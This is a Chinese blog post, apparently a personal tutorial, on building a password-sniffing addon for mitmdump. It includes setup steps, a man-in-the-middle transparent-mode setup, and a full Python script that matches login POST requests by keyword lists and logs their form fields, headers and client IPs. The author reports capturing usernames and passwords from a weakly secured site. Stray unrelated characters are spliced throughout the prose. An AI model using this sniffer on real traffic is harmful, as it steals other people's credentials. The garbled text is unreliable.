很久沒有寫文章了担平,一是沒空示绊,二是幾乎忘了還有這回事。這篇應(yīng)該是年前的最后一發(fā)吧暂论!那么今天就來聊一聊我最近關(guān)于網(wǎng)絡(luò)抓包的一些實踐(其實我對網(wǎng)絡(luò)安全領(lǐng)域知之甚少)面褐。當(dāng)然,大家最熟知的工具可能是 Wireshark取胎,它的功能十分強大展哭。不過它大概不支持熱插拔腳本,也就沒辦法實現(xiàn)完全自有掌控的抓包闻蛀。于是不就之后匪傍,Mitmproxy 這貨進入了我的視線,用它可以方便的添加自定義抓取邏輯的 Python 腳本循榆,可以說非常容易擴展析恢,完美的解決了我的需求。這也是寫完 Keykee 之后秧饮,再一次將這一傻式編程語言應(yīng)用到生產(chǎn)實踐中映挂。
突然想起了自己入行這兩年的一個感悟:
程序員有時候應(yīng)該感謝給自己提需求的人。
Mitmdump 是 Mitmproxy 的一個分支盗尸,它就是實現(xiàn)根據(jù)自定義的腳本進行 dump 的核心工具柑船。如果就是在自己機器上玩一玩的話,使用常規(guī)模式 (Regular Mode) 即可泼各。關(guān)于 Mitmproxy 這幾種模式的詳細(xì)介紹可以看官方文檔鞍时,這是常規(guī)模式的原理圖:
如果有中間人攻擊的因素在里面的話需要配合 Linux 的 ip_forward,并且使用 Mitmdump 的透明模式( Transparent Mode)扣蜻,它對客戶端來說是不可見的:
通常情況下逆巍,常規(guī)和透明這兩種模式可以滿足大部分的實驗需求。
Mitmdump 可以通過 pip 安裝:
$ pip install mitmproxy
安裝完之后就可以在任何地方使用 mitmdump
命令操作了莽使。
如果需要抓取 https 請求的話锐极,需要在系統(tǒng)中導(dǎo)入 Mitmproxy 的根證書,如果只在某個瀏覽器中實驗的的話芳肌,也可以直接在瀏覽器中導(dǎo)入灵再。證書的默認(rèn)位置在 ~/.mitmproxy
目錄下肋层。
然后設(shè)置系統(tǒng)的網(wǎng)絡(luò)代理,根據(jù)需要設(shè)置“對所有協(xié)議使用相同代理”翎迁。代理 ip 為 127.0.0.1栋猖,代理端口為 8080。
這樣汪榔,準(zhǔn)備工作就做好了蒲拉。
這次嘗試編寫一個密碼嗅探的腳本,前面提到了揍异,它的擴展性非常強!!柿菩!所以我這里就拋磚引玉了。
sniffer.py
import logging
from mitmproxy import http
password_key = ["password", "pwd", "pass", "passwd", "mm", "passport", "auth", "key", "mima"]
form_login_key = ["check", "login", "verify", "account", "logon", "signin", "denglu"]
class Sniffer:
def request(self, flow: http.HTTPFlow):
request = flow.request
url = request.pretty_url
form_url = str(request.urlencoded_form)
if request.method == 'POST':
if self.any_match(form_login_key, url) or self.any_match(password_key, form_url):
self.resolve(flow)
def any_match(self, list, str: str):
lower_str = str.lower()
for i in list:
if i in lower_str:
return True
return False
def resolve(self, flow: http.HTTPFlow):
request = flow.request
url = request.url
_from = str(flow.client_conn.ip_address)
url_form = str(request.urlencoded_form)
header = str(request.headers)
logging.info("url: %s \nheader: %s \nform: %s \nip_from: %s", url, header, url_form, _from)
Mitmdump 會創(chuàng)建一個 Sniffer
類的實例懦胞,并調(diào)用 request(flow)
方法凉泄,它可以一次插入多個這樣的 class,只需要提供一個統(tǒng)一的入口即可:
addons.py
from sniffer import Sniffer
addons = [
Sniffer()
# YourSniffer()
# ...
]
最后胀糜,執(zhí)行mitmdump
命令開始抓包:
$ mitmdump -q -s addons.py --set body-size-limit=10k "~m post"
- -q 屏蔽 mitmdump 默認(rèn)的控制臺日志蒂誉,只顯示自己腳本中的
- -s 入口腳本文件
- --set body-size-limit=10k 只處理小于 10k 的請求
- "~m post" 只處理 post 方法的請求
啟動之后訪問一個自己認(rèn)為安全性相對較差的站點,進行用戶登錄的操作括堤,然后控制臺里出現(xiàn)了用戶名密碼等信息绍移,如果經(jīng)過加密了,找到這個頁面的前端代碼研究一下加密方式蹂窖,安全性較差的站點很容易就能搞明白。
最后鸦致,歡迎來我的擺碼王子的小屋做客!
各位朋友分唾,新春愉快 : )